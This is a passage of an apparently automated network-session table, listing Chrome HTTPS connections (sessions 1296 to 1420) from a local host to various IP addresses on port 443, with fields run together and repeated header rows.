                                                                                                                                                          1296192.168.2.55108890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1297192.168.2.551085183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1298192.168.2.551084183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1299192.168.2.55108990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1300192.168.2.55109090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1301192.168.2.55109223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1302192.168.2.55109123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1303192.168.2.55109323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1304192.168.2.55109423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1305192.168.2.55109523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1306192.168.2.55109623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1307192.168.2.55109823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1308192.168.2.55110290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1309192.168.2.55110190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1310192.168.2.55110090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1311192.168.2.55110490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1312192.168.2.55110390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1313192.168.2.55109990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1314192.168.2.55110690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1315192.168.2.55109790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1316192.168.2.55110590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1317192.168.2.55110790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1318192.168.2.55111023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1319192.168.2.55111290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1320192.168.2.551108175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1321192.168.2.55111390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1322192.168.2.55110923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1323192.168.2.55111590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1324192.168.2.55111490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1325192.168.2.551111183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1326192.168.2.55111823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1327192.168.2.55112190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1328192.168.2.55112390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1329192.168.2.55112490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1330192.168.2.551116175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1331192.168.2.55112590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1332192.168.2.55112790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1333192.168.2.55112690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1334192.168.2.55112054.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1335192.168.2.55111943.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1336192.168.2.55112990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1337192.168.2.55112254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1338192.168.2.551128163.181.92.2414434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1339192.168.2.55113123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1340192.168.2.55113223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1341192.168.2.55113690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1342192.168.2.55113054.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1343192.168.2.55113554.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1344192.168.2.55113454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1345192.168.2.55113354.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1346192.168.2.55113790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1347192.168.2.55113923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1348192.168.2.55114190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1349192.168.2.55114023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1350192.168.2.55114923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1351192.168.2.55114523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1352192.168.2.55115123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1353192.168.2.551150108.157.194.574434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1354192.168.2.55113854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1355192.168.2.55115323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1356192.168.2.551142183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1357192.168.2.55115490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1358192.168.2.55115690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1359192.168.2.55115523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1360192.168.2.55115990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1361192.168.2.55115890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1362192.168.2.55116290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1363192.168.2.55114343.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1364192.168.2.55115790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1365192.168.2.55116090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1366192.168.2.55116190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1367192.168.2.55114743.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1368192.168.2.55114643.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1369192.168.2.55114843.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1370192.168.2.55115254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1371192.168.2.55116390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1372192.168.2.55114443.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1373192.168.2.55116523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1374192.168.2.55116690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1375192.168.2.55116790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1376192.168.2.55116890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1377192.168.2.55116990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1378192.168.2.55117090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1379192.168.2.55117123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1380192.168.2.55117223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1381192.168.2.55116454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1382192.168.2.55117990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1383192.168.2.551175175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1384192.168.2.55118290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1385192.168.2.55118190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1386192.168.2.55118090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1387192.168.2.55117654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1388192.168.2.55117754.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1389192.168.2.55117854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1390192.168.2.55118590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1391192.168.2.551183223.121.15.244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1392192.168.2.55118623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1393192.168.2.551184223.121.15.244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1394192.168.2.55118723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1395192.168.2.55111738.174.148.2334434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1396192.168.2.551189170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1397192.168.2.55119090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1398192.168.2.551191211.152.148.1094434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1399192.168.2.551173103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1400192.168.2.551188175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1401192.168.2.55119590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1402192.168.2.551196163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1403192.168.2.55119823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1404192.168.2.55119454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1405192.168.2.55120190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1406192.168.2.55119354.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1407192.168.2.55120323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1408192.168.2.55119243.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1409192.168.2.55120623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1410192.168.2.55120523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1411192.168.2.55120423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1412192.168.2.55120723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1413192.168.2.55119754.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1414192.168.2.55119954.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1415192.168.2.55120054.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1416192.168.2.55120254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1417192.168.2.55120890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1418192.168.2.55121023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1419192.168.2.55121490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1420192.168.2.55121190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
